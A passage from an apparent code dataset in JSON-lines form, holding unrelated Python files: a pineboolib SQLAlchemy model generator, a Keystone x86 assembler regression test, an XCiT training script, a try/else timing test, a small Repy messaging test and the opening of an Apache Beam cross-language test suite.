\"unlock\"):\n ret = \"sqlalchemy.Boolean\"\n\n elif type_ == \"timestamp\":\n ret = \"sqlalchemy.DateTime\"\n\n elif type_ == \"json\":\n ret = \"sqlalchemy.types.JSON\"\n\n elif type_ == \"time\":\n ret = \"sqlalchemy.Time\"\n\n elif type_ == \"date\":\n ret = \"sqlalchemy.Date\"\n\n elif type_ in (\"bytearray\"):\n ret = \"sqlalchemy.LargeBinary\"\n\n else:\n ret = \"Desconocido %s\" % type_\n\n data.append(ret)\n\n if field.isPrimaryKey():\n data.append(\"primary_key = True\")\n\n return \", \".join(data)\n\n\ndef generate_field_metadata(field: \"pnfieldmetadata.PNFieldMetaData\") -> List[str]:\n \"\"\"Generate field data from a PNFieldMetaData.\"\"\"\n\n field_data: List = []\n\n # NAME\n field_data.append(\"'name' : '%s'\" % field.name())\n\n # ALIAS\n if field.alias():\n field_data.append(\"'alias' : '%s'\" % field.alias().replace(\"'\", '\"'))\n\n # PK\n if field.isPrimaryKey():\n field_data.append(\"'pk' : True\")\n # CK\n if field.isCompoundKey():\n field_data.append(\"'ck' : True\")\n\n # TYPE\n field_relation: List[str] = []\n field_data.append(\"'type' : '%s'\" % field.type())\n\n # LENGTH\n if field.length():\n field_data.append(\"'length' : %s\" % field.length())\n\n # REGEXP\n if field.regExpValidator():\n field_data.append(\"'regexp' : '%s'\" % field.regExpValidator())\n\n rel_list: List[str]\n # RELATIONS 1M\n for rel in field.relationList():\n rel_list = []\n rel_list.append(\"'card' : '%s'\" % rel.cardinality())\n rel_list.append(\"'table' : '%s'\" % rel.foreignTable())\n rel_list.append(\"'field' : '%s'\" % rel.foreignField())\n if rel.deleteCascade():\n rel_list.append(\"'delc' : True\")\n if rel.updateCascade():\n rel_list.append(\"'updc' : True\")\n if not rel.checkIn():\n rel_list.append(\"'checkin' : False\")\n\n field_relation.append(\"{%s}\" % \", \".join(rel_list))\n\n # if field_relation:\n # field_data.append(\"'relations' : [%s]\" % \", \".join(field_relation))\n\n # RELATIONS M1\n if field.private._relation_m1:\n rel = field.private._relation_m1\n rel_list = []\n rel_list.append(\"'card' : '%s'\" % rel.cardinality())\n rel_list.append(\"'table' : '%s'\" % rel.foreignTable())\n rel_list.append(\"'field' : '%s'\" % rel.foreignField())\n if rel.deleteCascade():\n rel_list.append(\"'delC' : True\")\n if rel.updateCascade():\n rel_list.append(\"'updC' : True\")\n if not rel.checkIn():\n rel_list.append(\"'checkIn' : False\")\n\n field_relation.append(\"{%s}\" % \", \".join(rel_list))\n\n if field_relation:\n field_data.append(\"'relations' : [%s]\" % \", \".join(field_relation))\n\n # ASSOCIATED\n if field.private.associated_field_name:\n\n field_data.append(\n \"'associated':{'with' : '%s', 'by' : '%s' }\"\n % (field.private.associated_field_filter_to, field.private.associated_field_name)\n )\n\n # UNIQUE\n if field.isUnique():\n field_data.append(\"'isunique' : True\")\n\n # ALLOW_NULL\n if not field.allowNull():\n field_data.append(\"'null' : False\")\n\n # DEFAULT_VALUE\n if field.defaultValue() is not None:\n value = (\n field.defaultValue()\n if field.type() in [\"bool\", \"unlock\", \"int\", \"uint\", \"double\", \"serial\", \"json\"]\n else \"'%s'\" % field.defaultValue()\n )\n field_data.append(\"'default' : %s\" % value)\n\n # OUT_TRANSACTION\n if field.outTransaction():\n field_data.append(\"'outtransaction' : True\")\n\n # COUNTER\n if field.isCounter():\n field_data.append(\"'counter' : True\")\n\n # CALCULATED\n if field.calculated():\n field_data.append(\"'calculated' : True\")\n\n # FULLY_CALCULATED\n if field.fullyCalculated():\n field_data.append(\"'fullycalculated' : True\")\n\n # TRIMMED\n if field.trimmed():\n field_data.append(\"'trimmed' : True\")\n\n # VISIBLE\n if not field.visible():\n field_data.append(\"'visible' : False\")\n\n # VISIBLE_GRID\n if not field.visibleGrid():\n field_data.append(\"'visiblegrid' : False\")\n\n # EDITABLE\n if not field.editable():\n field_data.append(\"'editable' : False\")\n\n if field.type() == \"double\":\n # PARTI\n if field.partInteger():\n field_data.append(\"'partI' : %s\" % field.partInteger())\n\n # PARTD\n if field.partDecimal():\n field_data.append(\"'partD' : %s\" % field.partDecimal())\n\n # INDEX\n if field.isIndex():\n field_data.append(\"'index' : True\")\n\n # OPTIONS_LIST\n if field.optionsList():\n texto = \"\"\n for item in field.optionsList():\n texto += \"'%s', \" % item\n\n field_data.append(\"'optionslist' : [%s]\" % texto)\n # SEARCH_OPTIONS\n if field.searchOptions():\n texto = \"\"\n for item in field.searchOptions():\n texto += \"'%s', \" % item\n\n field_data.append(\"'searchoptions' : [%s]\" % texto)\n\n return field_data\n\n\ndef use_mtd_fields(path_model: str) -> bool:\n \"\"\"Return if models use mtd fields.\"\"\"\n\n file_ = open(path_model, \"r\", encoding=\"UTF-8\")\n lines = file_.readlines()\n file_.close()\n for line in lines:\n if line.find(\"legacy_metadata\") > -1:\n return False\n\n return True\n\n\ndef populate_fields(dest_file_name: str, mtd_name: str) -> str:\n \"\"\"Populate models fields with mtd field.\"\"\"\n\n new_file_path: str = \"\"\n if mtd_name in application.PROJECT.files.keys():\n file_mtd = application.PROJECT.files[mtd_name]\n\n file_ = open(dest_file_name, \"r\")\n lines = file_.readlines()\n file_.close()\n new_lines: List[str] = []\n for number, line in enumerate(list(lines)):\n if line.find(\"__tablename__\") > -1:\n new_lines = lines[0 : number + 1] + _get_meta(file_mtd) + lines[number + 1 :]\n break\n\n if new_lines:\n new_key = \"%s_model.py\" % file_mtd.filename[:-4]\n conn = application.PROJECT.conn_manager.mainConn()\n db_name = conn.DBName()\n application.PROJECT.files[new_key] = file.File(\n file_mtd.module,\n \"%s_model.py\" % file_mtd.path(),\n basedir=file_mtd.basedir,\n sha=file_mtd.sha,\n db_name=db_name,\n )\n application.PROJECT.files[new_key].filekey = \"%s_model.py\" % file_mtd.filekey\n new_file_path = application.PROJECT.files[new_key].path()\n if os.path.exists(new_file_path):\n os.remove(new_file_path)\n\n _write_file(new_file_path, new_lines)\n\n return new_file_path\n\n\ndef _create_declaration(\n mtd_table: \"pntablemetadata.PNTableMetaData\", header: bool = True\n) -> List[str]:\n \"\"\"Create metadata section.\"\"\"\n\n data: List[str] = []\n list_data_field: List[str] = []\n validator_list: List[str] = []\n metadata_table: List = []\n metadata_table.append(\"'name' : '%s'\" % mtd_table.name())\n metadata_table.append(\"'alias' : '%s'\" % mtd_table.alias())\n if mtd_table.isQuery():\n metadata_table.append(\"'query':'%s'\" % mtd_table.query())\n if mtd_table.concurWarn():\n metadata_table.append(\"'concurwarn': True\")\n if mtd_table.detectLocks():\n metadata_table.append(\"'detectlocks':True\")\n if mtd_table.FTSFunction():\n metadata_table.append(\"'ftsfunction' :'%s'\" % mtd_table.FTSFunction())\n\n try:\n mtd_table.primaryKey()\n except Exception as error: # noqa: F841\n pass\n\n field_list: List[List[str]] = []\n pk_found = False\n\n for field in mtd_table.fieldList(): # Crea los campos\n\n if field.isPrimaryKey():\n pk_found = True\n\n if field.name() in validator_list:\n LOGGER.warning(\n \"Hay un campo %s duplicado en %s.mtd. Omitido\", field.name(), mtd_table.name()\n )\n else:\n\n field_data = []\n field_data.append(\" \")\n if field.name() in RESERVER_WORDS:\n field_data.append(\"%s_\" % field.name())\n else:\n field_data.append(field.name())\n\n field_data.append(\" = sqlalchemy.Column('%s', \" % field.name())\n field_list.append(generate_field_metadata(field))\n field_data.append(generate_field(field))\n field_data.append(\")\")\n validator_list.append(field.name())\n if field.isPrimaryKey():\n pk_found = True\n\n list_data_field.append(\"\".join(field_data))\n\n meta_fields: List = []\n for meta_field in field_list:\n meta_fields.append(\"{%s}\" % \", \".join(meta_field))\n\n metadata_table.append(\n \"\\n 'fields' : [\\n %s\\n ]\" % \",\\n \".join(meta_fields)\n )\n\n class_name = \"%s%s\" % (mtd_table.name()[0].upper(), mtd_table.name()[1:])\n\n if header:\n data.append(\"# -*- coding: utf-8 -*-\")\n data.append(\"# Translated with pineboolib %s\" % application.PINEBOO_VER)\n data.append(\n '\"\"\"%s%s_model module.\"\"\"' % (mtd_table.name()[0].upper(), mtd_table.name()[1:])\n )\n data.append(\"\")\n\n data.append(\"from pineboolib.application.database.orm import basemodel\")\n data.append(\"from pineboolib.qsa import qsa\")\n data.append(\"\")\n data.append(\"import sqlalchemy\")\n data.append(\"\")\n data.append(\"\")\n\n data.append(\"# @class_declaration Oficial\")\n data.append(\"class Oficial(basemodel.BaseModel): # type: ignore [misc] # noqa: F821\")\n data.append(' \"\"\"Oficial class.\"\"\"')\n data.append(\" __tablename__ = '%s'\" % mtd_table.name()) # si query nombre query\n data.append(\"\")\n else:\n data.append(\"\")\n data.append(\"\")\n data.append(\" # --- POPULATED WITH METADATA FIELDS ---\")\n data.append(\"\")\n data.append(\"\")\n data.append(\" # --- Metadata --->\")\n data.append(\" legacy_metadata = {%s}\" % \", \".join(metadata_table))\n data.append(\"\\n\")\n data.append(\" # <--- Metadata ---\")\n\n data.append(\"\")\n\n data.append(\"\")\n data.append(\" # --- Fields --->\")\n data.append(\"\")\n\n for data_field in list_data_field:\n data.append(data_field)\n\n data.append(\"\")\n data.append(\" # <--- Fields ---\")\n\n data.append(\"\")\n if header:\n data.append(\"# @class_declaration %s\" % class_name)\n data.append(\n \"class %s(Oficial): # type: ignore [misc] # noqa: F821\" % class_name\n ) # si query nombre query\n data.append(' \"\"\"%s class.\"\"\"' % class_name)\n data.append(\" pass\")\n\n if not pk_found and not mtd_table.isQuery():\n LOGGER.warning(\n \"La tabla %s no tiene definida una clave primaria. No se generará el model.\"\n % (mtd_table.name())\n )\n data = []\n\n return data\n"} {"ext": "py", "sha": "1a2eebb7c19bacf5dae0ea0950d2f17e0427094b", "content": "#!/usr/bin/python\n\n# Tests if the SS segment override prefix is not explicitly produced when unnecessary\n\n# Github issue: #9\n# Author: Duncan (mrexodia)\n\nfrom keystone import *\n\nimport regress\n\nclass TestX86(regress.RegressTest):\n def runTest(self):\n # Initialize Keystone engine\n ks = Ks(KS_ARCH_X86, KS_MODE_32)\n # Assemble to get back insn encoding & statement count\n encoding1, _ = ks.asm(b\"MOV EAX,DWORD PTR SS:[ESP+8]\")\n encoding2, _ = ks.asm(b\"MOV EAX,DWORD PTR SS:[EBP+8]\")\n # Assert the result\n self.assertEqual(encoding1, [ 0x8B, 0x44, 0x24, 0x08 ])\n self.assertEqual(encoding2, [ 0x8B, 0x45, 0x08 ])\n\n encoding, _ = ks.asm(b\"MOV DWORD PTR SS:[EBP-0xC],0x1994000\")\n self.assertEqual(encoding, [ 0xC7, 0x45, 0xF4, 0x00, 0x40, 0x99, 0x01 ])\nif __name__ == '__main__':\n regress.main()\n"} {"ext": "py", "sha": "1a2eebea61469c862ce664d315bdd9275bcab6f5", "content": "# Copyright (c) 2015-present, Facebook, Inc.\n# All rights reserved.\n\"\"\"\nThe main training/evaluation loop\nModified from: https://github.com/facebookresearch/deit\n\"\"\"\nimport argparse\nimport datetime\nimport numpy as np\nimport time\nimport torch\nimport torch.backends.cudnn as cudnn\nimport json\nimport os\n\nfrom pathlib import Path\n\nfrom timm.data import Mixup\nfrom timm.models import create_model\nfrom timm.loss import LabelSmoothingCrossEntropy, SoftTargetCrossEntropy\nfrom timm.scheduler import create_scheduler\nfrom timm.optim import create_optimizer\nfrom timm.utils import NativeScaler, get_state_dict, ModelEma\n\nfrom datasets import build_dataset\nfrom engine import train_one_epoch, evaluate\nfrom losses import DistillationLoss\nfrom samplers import RASampler\nimport utils\n\nimport xcit\n\n\ndef get_args_parser():\n parser = argparse.ArgumentParser('XCiT training and evaluation script', add_help=False)\n parser.add_argument('--batch-size', default=64, type=int)\n parser.add_argument('--epochs', default=400, type=int)\n\n # Model parameters\n parser.add_argument('--model', default='xcit_s_12', type=str, metavar='MODEL',\n help='Name of model to train')\n parser.add_argument('--input-size', default=224, type=int, help='images input size')\n\n parser.add_argument('--drop', type=float, default=0.0, metavar='PCT',\n help='Dropout rate (default: 0.)')\n parser.add_argument('--drop-path', type=float, default=0.1, metavar='PCT',\n help='Drop path rate (default: 0.1)')\n\n parser.add_argument('--model-ema', action='store_true')\n parser.add_argument('--no-model-ema', action='store_false', dest='model_ema')\n parser.set_defaults(model_ema=True)\n parser.add_argument('--model-ema-decay', type=float, default=0.99996, help='')\n parser.add_argument('--model-ema-force-cpu', action='store_true', default=False, help='')\n\n # Optimizer parameters\n parser.add_argument('--opt', default='adamw', type=str, metavar='OPTIMIZER',\n help='Optimizer (default: \"adamw\"')\n parser.add_argument('--opt-eps', default=1e-8, type=float, metavar='EPSILON',\n help='Optimizer Epsilon (default: 1e-8)')\n parser.add_argument('--opt-betas', default=None, type=float, nargs='+', metavar='BETA',\n help='Optimizer Betas (default: None, use opt default)')\n parser.add_argument('--clip-grad', type=float, default=None, metavar='NORM',\n help='Clip gradient norm (default: None, no clipping)')\n parser.add_argument('--momentum', type=float, default=0.9, metavar='M',\n help='SGD momentum (default: 0.9)')\n parser.add_argument('--weight-decay', type=float, default=0.05,\n help='weight decay (default: 0.05)')\n\n # Learning rate schedule parameters\n parser.add_argument('--sched', default='cosine', type=str, metavar='SCHEDULER',\n help='LR scheduler (default: \"cosine\"')\n parser.add_argument('--lr', type=float, default=5e-4, metavar='LR',\n help='learning rate (default: 5e-4)')\n parser.add_argument('--lr-noise', type=float, nargs='+', default=None, metavar='pct, pct',\n help='learning rate noise on/off epoch percentages')\n parser.add_argument('--lr-noise-pct', type=float, default=0.67, metavar='PERCENT',\n help='learning rate noise limit percent (default: 0.67)')\n parser.add_argument('--lr-noise-std', type=float, default=1.0, metavar='STDDEV',\n help='learning rate noise std-dev (default: 1.0)')\n parser.add_argument('--warmup-lr', type=float, default=1e-6, metavar='LR',\n help='warmup learning rate (default: 1e-6)')\n parser.add_argument('--min-lr', type=float, default=1e-5, metavar='LR',\n help='lower lr bound for cyclic schedulers that hit 0 (1e-5)')\n\n parser.add_argument('--decay-epochs', type=float, default=30, metavar='N',\n help='epoch interval to decay LR')\n parser.add_argument('--warmup-epochs', type=int, default=5, metavar='N',\n help='epochs to warmup LR, if scheduler supports')\n parser.add_argument('--cooldown-epochs', type=int, default=10, metavar='N',\n help='epochs to cooldown LR at min_lr, after cyclic schedule ends')\n parser.add_argument('--patience-epochs', type=int, default=10, metavar='N',\n help='patience epochs for Plateau LR scheduler (default: 10')\n parser.add_argument('--decay-rate', '--dr', type=float, default=0.1, metavar='RATE',\n help='LR decay rate (default: 0.1)')\n\n # Augmentation parameters\n parser.add_argument('--color-jitter', type=float, default=0.4, metavar='PCT',\n help='Color jitter factor (default: 0.4)')\n parser.add_argument('--aa', type=str, default='rand-m9-mstd0.5-inc1', metavar='NAME',\n help='Use AutoAugment policy. \"v0\" or \"original\". \" + \\\n \"(default: rand-m9-mstd0.5-inc1)'),\n parser.add_argument('--smoothing', type=float, default=0.1, help='Label smoothing (default: 0.1)')\n parser.add_argument('--train-interpolation', type=str, default='bicubic',\n help='Training interpolation (random, bilinear, bicubic default: \"bicubic\")')\n\n parser.add_argument('--repeated-aug', action='store_true')\n parser.add_argument('--no-repeated-aug', action='store_false', dest='repeated_aug')\n parser.set_defaults(repeated_aug=True)\n\n # * Random Erase params\n parser.add_argument('--reprob', type=float, default=0.25, metavar='PCT',\n help='Random erase prob (default: 0.25)')\n parser.add_argument('--remode', type=str, default='pixel',\n help='Random erase mode (default: \"pixel\")')\n parser.add_argument('--recount', type=int, default=1,\n help='Random erase count (default: 1)')\n parser.add_argument('--resplit', action='store_true', default=False,\n help='Do not random erase first (clean) augmentation split')\n\n # * Mixup params\n parser.add_argument('--mixup', type=float, default=0.8,\n help='mixup alpha, mixup enabled if > 0. (default: 0.8)')\n parser.add_argument('--cutmix', type=float, default=1.0,\n help='cutmix alpha, cutmix enabled if > 0. (default: 1.0)')\n parser.add_argument('--cutmix-minmax', type=float, nargs='+', default=None,\n help='cutmix min/max ratio, overrides alpha and enables cutmix if set (default: None)')\n parser.add_argument('--mixup-prob', type=float, default=1.0,\n help='Probability of performing mixup or cutmix when either/both is enabled')\n parser.add_argument('--mixup-switch-prob', type=float, default=0.5,\n help='Probability of switching to cutmix when both mixup and cutmix enabled')\n parser.add_argument('--mixup-mode', type=str, default='batch',\n help='How to apply mixup/cutmix params. Per \"batch\", \"pair\", or \"elem\"')\n\n # Distillation parameters\n parser.add_argument('--teacher-model', default='regnety_160', type=str, metavar='MODEL',\n help='Name of teacher model to train (default: \"regnety_160\"')\n parser.add_argument('--teacher-path', type=str, default='')\n parser.add_argument('--distillation-type', default='none', choices=['none', 'soft', 'hard'], type=str, help=\"\")\n parser.add_argument('--distillation-alpha', default=0.5, type=float, help=\"\")\n parser.add_argument('--distillation-tau', default=1.0, type=float, help=\"\")\n\n\n # Dataset parameters\n parser.add_argument('--data-path', default='/datasets01/imagenet_full_size/061417/', type=str,\n help='dataset path')\n parser.add_argument('--data-set', default='IMNET', choices=['CIFAR10', 'CIFAR100', 'IMNET',\n 'INAT', 'INAT19', 'CARS', 'FLOWERS',\n 'IMNET22k'],\n type=str, help='Image Net dataset path')\n parser.add_argument('--inat-category', default='name',\n choices=['kingdom', 'phylum', 'class', 'order', 'supercategory', 'family', 'genus', 'name'],\n type=str, help='semantic granularity')\n\n parser.add_argument('--output_dir', default='',\n help='path where to save, empty for no saving')\n parser.add_argument('--device', default='cuda',\n help='device to use for training / testing')\n parser.add_argument('--seed', default=0, type=int)\n parser.add_argument('--resume', default='', help='resume from checkpoint')\n parser.add_argument('--start_epoch', default=0, type=int, metavar='N',\n help='start epoch')\n parser.add_argument('--eval', action='store_true', help='Perform evaluation only')\n parser.add_argument('--dist-eval', action='store_true', default=False, help='Enabling distributed evaluation')\n parser.add_argument('--num_workers', default=10, type=int)\n parser.add_argument('--pin-mem', action='store_true',\n help='Pin CPU memory in DataLoader for more efficient (sometimes) transfer to GPU.')\n parser.add_argument('--no-pin-mem', action='store_false', dest='pin_mem',\n help='')\n parser.set_defaults(pin_mem=True)\n\n # distributed training parameters\n parser.add_argument('--world_size', default=1, type=int,\n help='number of distributed processes')\n parser.add_argument('--dist_url', default='env://', help='url used to set up distributed training')\n parser.add_argument('--test-freq', default=1, type=int, help='Number of epochs between \\\n validation runs.')\n\n parser.add_argument('--full_crop', action='store_true', help='use crop_ratio=1.0 instead of the\\\n default 0.875 (Used by CaiT).')\n parser.add_argument(\"--pretrained\", default=None, type=str, help='Path to pre-trained checkpoint')\n parser.add_argument('--surgery', default=None, type=str, help='Path to checkpoint to copy the \\\n patch projection from. \\\n Can improve stability for very \\\n large models.')\n\n return parser\n\n\ndef main(args):\n utils.init_distributed_mode(args)\n\n print(args)\n\n device = torch.device(args.device)\n\n # fix the seed for reproducibility\n seed = args.seed + utils.get_rank()\n torch.manual_seed(seed)\n np.random.seed(seed)\n\n cudnn.benchmark = True\n\n dataset_train, args.nb_classes = build_dataset(is_train=True, args=args)\n dataset_val, _ = build_dataset(is_train=False, args=args)\n\n if True: # args.distributed:\n num_tasks = utils.get_world_size()\n global_rank = utils.get_rank()\n if args.repeated_aug:\n sampler_train = RASampler(\n dataset_train, num_replicas=num_tasks, rank=global_rank, shuffle=True\n )\n else:\n sampler_train = torch.utils.data.DistributedSampler(\n dataset_train, num_replicas=num_tasks, rank=global_rank, shuffle=True\n )\n if args.dist_eval:\n if len(dataset_val) % num_tasks != 0:\n print('Warning: Enabling distributed evaluation with an eval dataset not divisible by process number. '\n 'This will slightly alter validation results as extra duplicate entries are added to achieve '\n 'equal num of samples per-process.')\n sampler_val = torch.utils.data.DistributedSampler(\n dataset_val, num_replicas=num_tasks, rank=global_rank, shuffle=False)\n else:\n sampler_val = torch.utils.data.SequentialSampler(dataset_val)\n else:\n sampler_train = torch.utils.data.RandomSampler(dataset_train)\n sampler_val = torch.utils.data.SequentialSampler(dataset_val)\n\n data_loader_train = torch.utils.data.DataLoader(\n dataset_train, sampler=sampler_train,\n batch_size=args.batch_size,\n num_workers=args.num_workers,\n pin_memory=args.pin_mem,\n drop_last=True,\n )\n\n data_loader_val = torch.utils.data.DataLoader(\n dataset_val, sampler=sampler_val,\n batch_size=int(1.5 * args.batch_size),\n num_workers=args.num_workers,\n pin_memory=args.pin_mem,\n drop_last=False\n )\n\n mixup_fn = None\n mixup_active = args.mixup > 0 or args.cutmix > 0. or args.cutmix_minmax is not None\n if mixup_active:\n mixup_fn = Mixup(\n mixup_alpha=args.mixup, cutmix_alpha=args.cutmix, cutmix_minmax=args.cutmix_minmax,\n prob=args.mixup_prob, switch_prob=args.mixup_switch_prob, mode=args.mixup_mode,\n label_smoothing=args.smoothing, num_classes=args.nb_classes)\n\n print(f\"Creating model: {args.model}\")\n\n model = create_model(\n args.model,\n pretrained=False,\n num_classes=args.nb_classes,\n drop_rate=args.drop,\n drop_path_rate=args.drop_path,\n drop_block_rate=None\n )\n model = torch.nn.SyncBatchNorm.convert_sync_batchnorm(model)\n\n if args.pretrained:\n if args.pretrained.startswith('https'):\n checkpoint = torch.hub.load_state_dict_from_url(\n args.pretrained, map_location='cpu', check_hash=True)\n else:\n checkpoint = torch.load(args.pretrained, map_location='cpu')\n\n checkpoint_model = checkpoint['model']\n state_dict = model.state_dict()\n for k in ['head.weight', 'head.bias']:\n if k in checkpoint_model and checkpoint_model[k].shape != state_dict[k].shape:\n print(f\"Removing key {k} from pretrained checkpoint\")\n del checkpoint_model[k]\n\n model.load_state_dict(checkpoint_model, strict=True)\n\n model.to(device)\n\n if args.surgery:\n checkpoint = torch.load(args.surgery, map_location='cpu')\n checkpoint_model = checkpoint['model']\n patch_embed_weights = {key.replace(\"patch_embed.\", \"\"): value for key,\n value in checkpoint['model'].items() if 'patch_embed' in key}\n\n model.patch_embed.load_state_dict(patch_embed_weights)\n for p in model.patch_embed.parameters():\n p.requires_grad = False\n\n model_ema = None\n if args.model_ema:\n # Important to create EMA model after cuda(), DP wrapper, and AMP but before SyncBN and DDP wrapper\n model_ema = ModelEma(\n model,\n decay=args.model_ema_decay,\n device='cpu' if args.model_ema_force_cpu else '',\n resume='')\n\n model_without_ddp = model\n if args.distributed:\n model = torch.nn.parallel.DistributedDataParallel(model, device_ids=[args.gpu])\n model_without_ddp = model.module\n n_parameters = sum(p.numel() for p in model.parameters() if p.requires_grad)\n print('number of params:', n_parameters)\n\n linear_scaled_lr = args.lr * args.batch_size * utils.get_world_size() / 512.0\n args.lr = linear_scaled_lr\n optimizer = create_optimizer(args, model_without_ddp)\n loss_scaler = NativeScaler()\n\n lr_scheduler, _ = create_scheduler(args, optimizer)\n\n criterion = LabelSmoothingCrossEntropy()\n\n if args.mixup > 0.:\n # smoothing is handled with mixup label transform\n criterion = SoftTargetCrossEntropy()\n elif args.smoothing:\n criterion = LabelSmoothingCrossEntropy(smoothing=args.smoothing)\n else:\n criterion = torch.nn.CrossEntropyLoss()\n\n teacher_model = None\n if args.distillation_type != 'none':\n assert args.teacher_path, 'need to specify teacher-path when using distillation'\n print(f\"Creating teacher model: {args.teacher_model}\")\n teacher_model = create_model(\n args.teacher_model,\n pretrained=False,\n num_classes=args.nb_classes,\n global_pool='avg',\n )\n if args.teacher_path.startswith('https'):\n checkpoint = torch.hub.load_state_dict_from_url(\n args.teacher_path, map_location='cpu', check_hash=True)\n else:\n checkpoint = torch.load(args.teacher_path, map_location='cpu')\n\n teacher_model.load_state_dict(checkpoint['model'])\n\n teacher_model.to(device)\n teacher_model.eval()\n\n # wrap the criterion in our custom DistillationLoss, which\n # just dispatches to the original criterion if args.distillation_type is 'none'\n criterion = DistillationLoss(\n criterion, teacher_model, args.distillation_type, args.distillation_alpha, args.distillation_tau\n )\n\n output_dir = Path(args.output_dir)\n if not os.path.exists(output_dir):\n os.mkdir(output_dir)\n\n resume_path = os.path.join(output_dir, 'checkpoint.pth')\n if args.resume and os.path.exists(resume_path):\n if args.resume.startswith('https'):\n checkpoint = torch.hub.load_state_dict_from_url(\n args.resume, map_location='cpu', check_hash=True)\n else:\n print(\"Loading from checkpoint ...\")\n checkpoint = torch.load(resume_path, map_location='cpu')\n model_without_ddp.load_state_dict(checkpoint['model'])\n if not args.eval and 'optimizer' in checkpoint and 'lr_scheduler' in checkpoint and 'epoch' in checkpoint:\n optimizer.load_state_dict(checkpoint['optimizer'])\n lr_scheduler.load_state_dict(checkpoint['lr_scheduler'])\n args.start_epoch = checkpoint['epoch'] + 1\n if args.model_ema:\n utils._load_checkpoint_for_ema(model_ema, checkpoint['model_ema'])\n if 'scaler' in checkpoint:\n loss_scaler.load_state_dict(checkpoint['scaler'])\n\n if args.eval:\n test_stats = evaluate(data_loader_val, model, device)\n print(f\"Accuracy of the network on the {len(dataset_val)} test images: {test_stats['acc1']:.1f}%\")\n return\n\n print(f\"Start training for {args.epochs} epochs\")\n start_time = time.time()\n max_accuracy = 0.0\n for epoch in range(args.start_epoch, args.epochs):\n if args.distributed:\n data_loader_train.sampler.set_epoch(epoch)\n\n train_stats = train_one_epoch(\n model, criterion, data_loader_train,\n optimizer, device, epoch, loss_scaler,\n args.clip_grad, model_ema, mixup_fn,\n surgery=args.surgery\n )\n\n lr_scheduler.step(epoch)\n if args.output_dir:\n checkpoint_paths = [output_dir / 'checkpoint.pth']\n for checkpoint_path in checkpoint_paths:\n utils.save_on_master({\n 'model': model_without_ddp.state_dict(),\n 'optimizer': optimizer.state_dict(),\n 'lr_scheduler': lr_scheduler.state_dict(),\n 'epoch': epoch,\n 'model_ema': get_state_dict(model_ema),\n 'scaler': loss_scaler.state_dict(),\n 'args': args,\n }, checkpoint_path)\n\n if (epoch % args.test_freq == 0) or (epoch == args.epochs - 1):\n test_stats = evaluate(data_loader_val, model, device)\n\n if test_stats[\"acc1\"] >= max_accuracy:\n utils.save_on_master({\n 'model': model_without_ddp.state_dict(),\n 'optimizer': optimizer.state_dict(),\n 'lr_scheduler': lr_scheduler.state_dict(),\n 'epoch': epoch,\n 'model_ema': get_state_dict(model_ema),\n 'args': args,\n }, os.path.join(output_dir, 'best_model.pth'))\n\n print(f\"Accuracy of the network on the {len(dataset_val)} test images: {test_stats['acc1']:.1f}%\")\n max_accuracy = max(max_accuracy, test_stats[\"acc1\"])\n print(f'Max accuracy: {max_accuracy:.2f}%')\n\n log_stats = {**{f'train_{k}': v for k, v in train_stats.items()},\n **{f'test_{k}': v for k, v in test_stats.items()},\n 'epoch': epoch,\n 'n_parameters': n_parameters}\n\n if args.output_dir and utils.is_main_process():\n with (output_dir / \"log.txt\").open(\"a\") as f:\n f.write(json.dumps(log_stats) + \"\\n\")\n\n total_time = time.time() - start_time\n total_time_str = str(datetime.timedelta(seconds=int(total_time)))\n print('Training time {}'.format(total_time_str))\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser('XCiT training and evaluation script', parents=[get_args_parser()])\n args = parser.parse_args()\n if args.output_dir:\n Path(args.output_dir).mkdir(parents=True, exist_ok=True)\n main(args)\n"} {"ext": "py", "sha": "1a2eed3a1d54dddbdefb034dee20a0c99e513fe1", "content": "###################################\n# File Name : exception_performance.py\n###################################\n#!/usr/bin/python3\n\nimport os\nimport time\n\nTRY_TEST_FILE=\"performance_try_file\"\nTRY_ELSE_TEST_FILE=\"performance_try_else_file\"\n\ndef write_file_only_try():\n try:\n f = open(TRY_TEST_FILE, \"w\")\n\n for i in range(10000000):\n f.write(str(i))\n\n f.close()\n except:\n print (\"File open error\")\n finally:\n os.remove(TRY_TEST_FILE)\n\ndef write_file_try_else():\n try:\n f = open(TRY_ELSE_TEST_FILE, \"w\")\n except:\n print (\"File open error\")\n else:\n for i in range(10000000):\n f.write(str(i))\n\n f.close()\n finally:\n os.remove(TRY_ELSE_TEST_FILE)\n\ndef check_runtime(func):\n accumulate_time = 0\n for i in range(10):\n start = time.time()\n func()\n accumulate_time += (time.time() - start)\n print (\"Run time summary : %s\" % str(accumulate_time / 10))\n\n\nif __name__ == \"__main__\":\n print (\"=== Try Performance Test ===\")\n check_runtime(write_file_only_try)\n\n print (\"=== Try/Else Performance Test ===\")\n check_runtime(write_file_try_else)\n"} {"ext": "py", "sha": "1a2eed613faa08496c8905dc43f153e18b0df979", "content": "#pragma out\n#pragma repy\n\ndef foo(ip,port,mess, ch):\n print ip,port,mess,ch\n stopcomm(ch)\n\nif callfunc == 'initialize':\n ip = getmyip()\n recvmess(ip,,foo)\n sleep(.1)\n sendmess(ip,,'hi')\n"} {"ext": "py", "sha": "1a2eee7c782323d32fa6afe322d8b0b4f6a6c96d", "content": "#\n# Licensed to the Apache Software Foundation (ASF) under one or more\n# contributor license agreements. See the NOTICE file distributed with\n# this work for additional information regarding copyright ownership.\n# The ASF licenses this file to You under the Apache License, Version 2.0\n# (the \"License\"); you may not use this file except in compliance with\n# the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\n\"\"\"\n###########################################################\nRunner Validation Test Suite for Cross-language Transforms\n###########################################################\n As per Beams's Portability Framework design, Cross-language transforms\n should work out of the box. In spite of this, there always exists a\n possibility of rough edges existing. It could be caused due to unpolished\n implementation of any part of the execution code path, for example:\n - Transform expansion [SDK]\n - Pipeline construction [SDK]\n - Cross-language artifact staging [Runner]\n - Language specific serialization/deserialization of PCollection (and\n other data types) [Runner/SDK]\n\n In an effort to improve developer visibility into potential problems,\n this test suite validates correct execution of 5 Core Beam transforms when\n used as cross-language transforms within the Python SDK from any foreign SDK:\n - ParDo\n (https://beam.apache.org/documentation/programming-guide/#pardo)\n - GroupByKey\n (https://beam.apache.org/documentation/programming-guide/#groupbykey)\n - CoGroupByKey\n 